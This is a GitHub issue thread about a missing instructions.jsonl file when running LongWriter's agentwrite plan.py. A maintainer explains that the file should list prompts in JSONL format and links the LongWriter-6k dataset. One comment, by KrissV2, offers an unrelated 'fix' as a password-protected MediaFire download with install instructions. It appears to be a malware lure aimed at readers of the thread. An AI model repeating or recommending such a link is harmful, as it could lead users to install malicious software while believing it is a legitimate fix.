### ISSUE TITLE
agentwriter plan.py missing file instructions.jsonl

### ISSUE THREAD

**Issue by toninog** [THUDM/LongWriter#23]
### System Info / 系統信息

Python 3.11.4, CUDA Version: 12.4, transformers Version: 4.44.0

### Information / 问题信息

- [X] The official example scripts / 官方的示例脚本
- [ ] My own modified scripts / 我自己修改的脚本和任务

### Reproduction / 复现过程

steps to reproduce

1. cd agentwrite
2. python3 plan.py

Traceback (most recent call last):
  File "~/LongWriter/agentwrite/plan.py", line 91, in <module>
    with open(in_file, encoding='utf-8') as f:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'instructions.jsonl'

### Expected behavior / 期待表现

the plan to be created

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bys0318** [comment]
`instructions.jsonl` has to be a file that contains all your prompts that are ready to use agentwrite to obtain the long-output responses. Format each line as `{"prompt": "xxx", ...}`.

**Comment by toninog** [comment]
Thanks!

**Comment by ameza13** [comment]
Hello @bys0318 , could you please share your` instructions.jsonl` file?

Thanks,

**Comment by bys0318** [comment]
Hi, you can download the instruction data file of LongWriter-6k from [hf](https://huggingface.co/datasets/THUDM/LongWriter-6k).

**Comment by toninog** [comment]
here is my example of the instructions.jsonl

`{ "prompt": "Write a 10000-word essay about the roman empire"}`
